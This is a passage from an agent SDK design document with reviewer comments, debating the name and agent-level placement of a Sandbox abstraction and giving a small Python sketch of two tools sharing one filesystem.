I'm not sure this is clear. This is not a Sandbox; I feel like it's the opposite of "clear" ;). It can be a sandbox, but LocalSandbox is not clear IMHO.

Some more alternatives:

- `ExecutionRuntime`
- `CodeEnvironment`
- `ToolEnvironment`
- `ToolExecutionEnvironment`
- `ToolBackend`

### P2

- [ ] Implement `CodeActPlugin`
- [ ] Add Anthropic advanced tool use support (tool search tool, tool use examples)
**Reviewer comment:**

This one seems like a separate workstream

- [ ] Tool proxy: implement proxy server, stub generation, and integrate with programmatic tool caller and CodeAct
- [ ] Mirror `Sandbox` interface in `sdk-typescript`
**Reviewer comment:**

Depending on timelines, I would expect this to be done much sooner. We should be doing each phase in parallel.


We considered making Sandbox a tool-level concern — each tool would optionally accept a Sandbox in its constructor. This avoids SDK changes but means every tool must independently handle Sandbox injection, and there is no guarantee that tools share the same Sandbox instance.

Rejected because the shared-environment property (tools operating in the same filesystem) requires the Sandbox to be agent-level, not tool-level.
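The shared-environment property is easy to state concretely: two tools that never reference each other still see the same filesystem because they reach it through the agent. All names below are illustrative stand-ins, not SDK classes:

```python
import pathlib
import tempfile

class SharedSandbox:
    """Stand-in for an agent-level sandbox: one working directory that every
    tool attached to the agent operates in."""
    def __init__(self):
        self.root = pathlib.Path(tempfile.mkdtemp())

class AgentSketch:
    def __init__(self):
        self.sandbox = SharedSandbox()  # agent-level, per the recommendation

# Two independent tools that only know about the agent, not each other.
def file_write(agent, name: str, text: str) -> None:
    (agent.sandbox.root / name).write_text(text)

def file_read(agent, name: str) -> str:
    return (agent.sandbox.root / name).read_text()

agent = AgentSketch()
file_write(agent, "plan.md", "step 1: survey prior art")
plan = file_read(agent, "plan.md")  # sees file_write's output
```

With tool-level sandboxes, nothing would force the two constructors to receive the same instance, and the read would miss the write.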
**Reviewer comment:**

I was convinced that agent.sandbox should/can exist.

However this:

> Rejected because the shared-environment property... requires the Sandbox to be agent-level, not tool-level.

Is a larger issue that we can address. E.g. if we wanted to limit Sandbox to not be fundamental to an agent, then we need a mechanism to store non-JSON data with an agent, e.g.:

```python
agent.services.set(Sandbox, sandbox)
sandbox = agent.services.get(Sandbox)
```
